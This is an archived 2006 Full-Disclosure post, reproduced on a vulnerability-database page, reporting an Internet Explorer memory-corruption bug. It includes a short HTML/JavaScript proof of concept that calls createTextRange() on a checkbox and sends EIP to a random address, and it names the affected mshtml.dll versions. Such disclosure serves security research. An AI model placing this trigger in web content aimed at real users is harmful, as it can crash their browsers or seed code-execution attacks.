Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11892
HistoryMar 22, 2006 - 12:00 a.m.

[Full-disclosure] IE crash

2006-03-2200:00:00
vulners.com
14

I can't find any info on this delicious IE bug, but it seems to be publicly known:

<input type="checkbox" id='c'>
<script>
r=document.getElementById("c");
a=r.createTextRange();
</script>

It will badly access a (virtual?) pointer table, making EIP to jump at a random
address. This has various effects on the system I've tested with, including
crashing. It works on these versions of mshtml.dll:
XP SP2: 6.0.2900.2802 - latest
WS2003: 6.0.3790.0


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/